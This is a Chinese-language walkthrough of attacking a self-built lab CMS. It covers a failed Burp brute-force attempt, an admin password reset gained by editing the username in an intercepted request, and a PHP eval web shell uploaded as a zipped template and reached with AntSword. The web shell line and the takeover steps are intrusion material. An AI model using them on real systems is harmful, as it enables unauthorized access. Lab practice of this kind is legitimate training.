先简单看一看网站的主页面

总感觉似曾相识，说不出来的熟悉，哈哈！！

看一下robots，因为是自己搭建的靶场，就不用nmap扫了

好家伙，一眼丁真，直接看到admin后台

！！？？没验证码，直接奖励一波bp爆破

一顿输出后没结果！！(因为这个靶场搭建的时候，设置admin密码必须要英文+数字+下划线)，所以基本是爆不出来的

点一下忘记密码瞅瞅

映入眼帘的就行一个版本号！！虽然在上面后台也显示了，没注意。。。

那就直接丢百度搜一波看看

存在越权漏洞，普通用户注册后改密码通过抓包可以直接修改后台admin的密码

注册地址：ip/member/

浅浅的注册一个用户

这边开启bp代理抓包

直接将test用户名改成admin即可越权修改admin的密码

成功进入后台，奥里给！！

在后台看到好多图片上传点，奈何都有白名单限制！！绕不过去啊！！

看到这边眼前一亮！！

而且在百度看了一圈，大概意思就是说zip里面的文件上次后会自动解压在/templates/目录中

这不就完美了，直接写个一句话“<?php @eval($_POST[cmd]);?>”改为php

然后zip压缩上传

成功上传

附上靶机上面的截图

蚁剑直接上

成功拿下！！

靶机下载地址：点我下载